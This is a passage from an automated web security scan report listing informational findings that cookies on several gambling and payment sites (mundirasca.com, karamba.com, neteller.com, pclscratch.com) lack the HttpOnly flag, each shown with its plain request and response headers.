Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

12.264. http://www.karamba.com/click/Karamba.com/ENG/Home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/click/Karamba.com/ENG/Home/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:02 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/Karamba.com/ENG/Home/ HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

12.265. http://www.mundirasca.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:40 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

12.266. http://www.mundirasca.com/AboutUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/AboutUs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:41 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

12.267. http://www.mundirasca.com/ContactUsChat.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/ContactUsChat.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsChat.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

12.268. http://www.mundirasca.com/ContactUsFax.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/ContactUsFax.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

12.269. http://www.mundirasca.com/ContactUsMail.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.270. http://www.mundirasca.com/ContactUsTel.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/ContactUsTel.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

12.271. http://www.mundirasca.com/FAQ.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/FAQ.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FAQ.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

12.272. http://www.mundirasca.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/FairPlay.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:02 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

12.273. http://www.mundirasca.com/Help.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/Help.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.274. http://www.mundirasca.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_17=EncryptedUniqueVisitorID=65E5179F214E218C7690B36C8457FF60&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=mundirasca.com; expires=Fri, 16-May-2031 11:41:38 GMT; path=/
UniqueVisitorID=65E5179F214E218C7690B36C8457FF60; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:38 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dvkvwu55wj1sbf3o2utk1m55; path=/; HttpOnly
Set-Cookie: CSI_17=EncryptedUniqueVisitorID=65E5179F214E218C7690B36C8457FF60&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=mundirasca.com; expires=Fri, 16-May-2031 11:41:38 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: UniqueVisitorID=65E5179F214E218C7690B36C8457FF60; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Vary: Accept-Encoding
Content-Length: 37105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.275. http://www.mundirasca.com/InviteFriend.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/InviteFriend.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

12.276. http://www.mundirasca.com/PlayersClub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/PlayersClub.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

12.277. http://www.mundirasca.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/Promotions.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

12.278. http://www.mundirasca.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/Responsible.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

12.279. http://www.mundirasca.com/SecurityAndPrivacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:54 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

12.280. http://www.mundirasca.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/Terms.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 104767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.281. http://www.mundirasca.com/UnderAge.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/UnderAge.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:06 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

12.282. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/click/MundiRasca.com/SPA/Home/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/MundiRasca.com/SPA/Home/ HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

12.283. http://www.neteller.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neteller.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-gbooldlg=3B765357B0213B9F4C30F843CD444976;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.neteller.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 16 May 2011 12:13:10 GMT
Location: https://www.neteller.com/
Connection: close
Set-Cookie: X-Mapping-gbooldlg=3B765357B0213B9F4C30F843CD444976;path=/
Content-Length: 209

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.neteller.com/">here</a>.</p>
</body
...[SNIP]...

12.284. http://www.pclscratch.com/ContactUsMail.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pclscratch.com
Path:	/ContactUsMail.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_7=EncryptedUniqueVisitorID=D7055B8BAFCDE05E5E8BAE8EAA5B2A9D&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:28 GMT; path=/
UniqueVisitorID=D7055B8BAFCDE05E5E8BAE8EAA5B2A9D; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.285. http://www.pclscratch.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pclscratch.com
Path:	/FairPlay.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

